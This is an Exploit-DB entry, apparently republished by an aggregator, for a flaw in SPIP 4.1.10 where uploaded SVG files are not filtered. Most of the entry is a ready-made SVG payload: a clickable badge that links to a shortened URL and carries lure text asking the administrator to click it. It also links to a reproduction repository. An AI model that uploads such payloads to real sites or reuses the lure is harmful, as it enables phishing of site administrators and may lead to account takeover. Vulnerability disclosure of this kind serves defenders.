[webapps] spip v4.1.10 - Spoofing Admin account
2023-7-3 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:4 收藏

Platform:

PHP

Date:

2023-07-03



## Exploit Title: spip v4.1.10 - Spoofing Admin account 
## Author: nu11secur1ty
## Date: 06.29.2023
## Vendor: https://www.spip.net/en_rubrique25.html
## Software: https://files.spip.net/spip/archives/spip-v4.1.10.zip
## Reference: https://www.crowdstrike.com/cybersecurity-101/spoofing-attacks/

## Description:
The malicious user can upload a malicious SVG file which file is not
filtered by a security function, and he can trick
the administrator of this system to check his logo by clicking on him
and visiting, maybe a very dangerous URL.
Wrong web app website logic, and not well sanitizing upload function.

STATUS: HIGH- Vulnerability

[+]Exploit:
```SVG
   <svg xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
     <defs>
       <linearGradient id="badgeGradient">
         <stop offset="0"/>
         <stop offset="1"/>
       </linearGradient>
     </defs>

     <g id="heading">
       <a xlink:href= "https://rb.gy/74f0y">
         <path id="badge" d="M 29.6,22.8 C 29.2,23.4 24.3,22.4
23.8,22.9 C 23.4,23.3 24.3,28.3 23.8,28.6 C 23.2,28.9 19.4,25.6
18.8,25.8 C 18.2,26.0 16.5,30.7 15.8,30.7 C 15.2,30.7 13.5,26.0
12.9,25.8 C 12.3,25.6 8.5,28.9 7.9,28.6 C 7.4,28.3 8.3,23.3 7.9,22.9 C
7.4,22.4 2.4,23.4 2.1,22.8 C 1.8,22.3 5.1,18.4 4.9,17.8 C 4.8,17.2
0.0,15.5 0.0,14.9 C 0.0,14.3 4.8,12.6 4.9,12.0 C 5.1,11.4 1.8,7.5
2.1,7.0 C 2.4,6.4 7.4,7.3 7.9,6.9 C 8.3,6.5 7.4,1.5 7.9,1.2 C 8.5,0.9
12.3,4.1 12.9,4.0 C 13.5,3.8 15.2,-0.8 15.8,-0.8 C 16.5,-0.8 18.2,3.8
18.8,4.0 C 19.4,4.1 23.2,0.9 23.8,1.2 C 24.3,1.5 23.4,6.5 23.8,6.9 C
24.3,7.3 29.2,6.4 29.6,7.0 C 29.9,7.5 26.6,11.4 26.8,12.0 C 26.9,12.6
31.7,14.3 31.7,14.9 C 31.7,15.5 26.9,17.2 26.8,17.8 C 26.6,18.4
29.9,22.3 29.6,22.8 z"/>
         <!--<text id="label" x="5" y="20" transform = "rotate(-15 10
10)">New</text>-->
         <text id="title" x="40" y="20">Please click on the logo, to
see our design services, on our website, thank you!</text>
       </a>
     </g>

   </svg>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/SPIP-4.1.10)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/spip-v4110-spoofing-admin-account.html)

## Time spend:
00:37:00
            

文章来源: https://www.exploit-db.com/exploits/51557
如有侵权请联系:admin#unsafe.sh